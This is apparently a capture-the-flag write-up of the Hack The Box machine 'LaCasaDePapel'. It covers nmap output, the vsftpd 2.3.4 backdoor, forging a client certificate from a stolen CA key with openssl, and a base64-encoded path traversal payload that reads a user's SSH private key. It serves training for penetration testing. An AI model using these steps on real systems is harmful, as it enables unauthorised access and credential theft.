Nmap scan report for 10.10.10.131 Host is up (0.17s latency). Not shown: 65530 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 7.9 (protocol 2.0) | ssh-hostkey: | 2048 03:e1:c2:c9:79:1c:a6:6b:51:34:8d:7a:c3:c7:c8:50 (RSA) | 256 41:e4:95:a3:39:0b:25:f9:da:de:be:6a:dc:59:48:6d (ECDSA) |_ 256 30:0b:c6:66:2b:8f:5e:4f:26:28:75:0e:f5:b1:71:e4 (ED25519) 80/tcp open http Node.js (Express middleware) |_http-title: La Casa De Papel 443/tcp open ssl/http Node.js Express framework | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Server returned status 401 but no WWW-Authenticate header. |_http-title: La Casa De Papel | ssl-cert: Subject: commonName=lacasadepapel.htb/organizationName=La Casa De Papel | Not valid before: 2019-01-27T08:35:30 |_Not valid after: 2029-01-24T08:35:30 |_ssl-date: TLS randomness does not represent time | tls-nextprotoneg: | http/1.1 |_ http/1.0 6200/tcp filtered lm-x Service Info: OS: Unix
After the nmap scan, it looked like this box was going to be pretty heavy on the web application exploitation which was something I knew I had to get better at with my upcoming OSCP exam.
After poking around at the webserver for a bit, there wasn’t much I could find on the http side and even after running dirsearch/gobuster against it with some extensive dictionaries came up with nil. The https side of the server would not let you connect to it to further enumerate until you had a valid ssl certificate for ‘client certificate authentication‘ which I didn’t have yet. This left me at a bit of a dead end, so I went back to check out the nmap scan and noticed the port 6200 that I previously overlooked due to it being filtered.
Some quick googling came up with that port being a common port for vsftpd, but any attempt to connect to it was rejected so there had to be a way to get that port to open up for me. Checking out searchsploit I saw this version of vsftp had a backdoor maliciously installed on it (2.3.4) and was able to get the port to open up after connecting to the FTP server.
So now that port 6200 is open we’re greeted with something called ‘psy shell’, which didn’t have any vulnerabilities I could find with an initial search. It did, however, have the ability for you to write -some- valid forms of php into and allowed for enumeration of files on the server. I say ‘some’, because the obvious reverse shells or system commands that I thought may be able to get some form of code execution. Shown in the picture above, there was a variable listed that gave a bit of a hint as to how we can use this shell to get what we needed.
So now that we’ve got a private key for the CA, this will allow me to create a key to get past the requirement on the HTTPS side of things. First, to grab the public certificate from the server:
echo | \ openssl s_client -servername 10.10.10.131 -connect 10.10.10.131:443 2>/dev/null | \ openssl x509 -text
Now, since I’ve got a private key and a public key, the last step will be to generate a new user certificate from those two. This took a ridiculous amount of googling as I was familiar with the concept of public/private key generation but this was my first time using ‘client certificate authentication’ which this box used. I’m just mentioning that, because in hindsight it’s rather easy, but at the time I was thoroughly confused as to how to get this working correctly. Commands are as follows:
openssl req -new -key cert.key -out req.csr (cert.key is the private key grabbed from psyshell and this will generate a certificate signing request that would normally have to be sent to the server to be signed with that private key) openssl x509 -req -days 365 -in req.csr -signkey cert.key -out REQ.crt (this creates the actual certificate that will be used when the server requests client authentication) openssl pkcs12 -export -in REQ.crt -inkey cert.key -out server.p12 (this is necessary for firefox specifically, Chrome may only need the crt file but firefox only allowed for p12 format)
With a valid certificate ‘signed’ by the private key stolen off the server, now it’s possible to get past the request when visiting the https side of the web server.
Still no foothold on the server with this, but it is possible to navigate through the https server now at least in the browser. After browsing a bit through the files, I noticed that the file names seemed to be base64 encoded and that led to finding that there is actually an LFI vulnerability in the server. This sent me back to the Psyshell I had access to earlier where I noted down the valid users on the box and found a valid key that I could grab out of the browser.
../../../../../home/berlin/.ssh/id_rsa base64 encode this and you get what I put into the browser as the LFI Li4vLi4vLi4vLi4vLi4vaG9tZS9iZXJsaW4vLnNzaC9pZF9yc2E=
Enumerating the users earlier turned out to be very useful, as I had access to Berlin via the webserver, but the key ended up being valid for the user ‘professor’.
This part turned out to be very easy to exploit, but the permissions on the files lead you to believe that you can’t edit them even when it was possible to do so. This just goes to show don’t always trust in what you’re presented with, as I spent a ridiculous amount of time on this part of the box when I dismissed the fact that I ‘coudln’t’ do what I wanted with the files.
Using the reverse shell via node here, got permissions of the nobody ‘user’.
Overall a really fun box that introduced me to a new form of authentication and added another flavor of reverse shell using node. In hindsight, I can see why this box was marked as easy, but there were numerous hiccups in my thought process that led to this taking a couple of days as opposed to a couple hours as it probably should have.